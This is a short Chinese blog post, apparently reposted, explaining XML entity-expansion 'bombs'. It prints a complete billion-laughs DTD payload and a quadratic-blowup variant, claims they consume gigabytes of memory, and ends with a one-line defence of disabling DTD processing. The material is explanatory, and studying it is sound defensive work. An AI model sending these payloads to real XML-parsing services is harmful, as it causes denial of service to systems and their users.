XML炸弹

时间 2019-11-05

标签 xml 炸弹栏目 XML 繁體版

原文原文链接

XML炸弹
XML document type definition (DTD)能够定义entity，DTD能够出如今外部文件或文件内部。
利用DTD能够产生XML炸弹，也就是能迅速占用大量内存的文件，以下为例：
当XML解析器尝试解析该文件时，因为DTD的定义指数级展开，这个1K不到的文件会占用到3G的内存。spa

 
         <?xml version= 
         "1.0" 
         ?> 
        
         <!DOCTYPE lolz [ 
        
         <!ENTITY lol  
         "lol" 
         > 
        
         <!ENTITY lol2  
         "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" 
         > 
        
         <!ENTITY lol3  
         "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;" 
         > 
        
         <!ENTITY lol4  
         "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;" 
         > 
        
         <!ENTITY lol5  
         "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;" 
         > 
        
         <!ENTITY lol6  
         "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;" 
         > 
        
         <!ENTITY lol7  
         "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;" 
         > 
        
         <!ENTITY lol8  
         "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;" 
         > 
        
         <!ENTITY lol9  
         "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;" 
         > 
        
         ]> 
        
         <lolz>&lol9;</lolz>

还有一种，虽然扩展率没那么大，也颇有效。200K的可以扩展到2.5G。code

 
         <?xml version= 
         "1.0" 
         ?> 
        
         <!DOCTYPE kaboom [ 
        
         <!ENTITY a  
         "aaaaaaaaaaaaaaaaaa..." 
         > 
        
         ]> 
        
         <kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>

防护XML炸弹
禁止DTDxml

1. 【Unity2DMobileGame06】—— 制作炸弹以及炸弹的爆炸效果
2. P5025 [SNOI2017]炸弹
3. 炸弹人
4. 引爆炸弹
5. bzoj5017 [Snoi2017]炸弹
6. 时间炸弹
7. [Snoi2017]炸弹
8. 星系炸弹
9. shell炸弹
10. 【dfs】引爆炸弹
更多相关文章...
• jQuery Mobile 弹窗 - jQuery Mobile 教程
• XML - E4X - XML 教程
• TiDB 在摩拜单车在线数据业务的应用和实践
• NewSQL-TiDB相关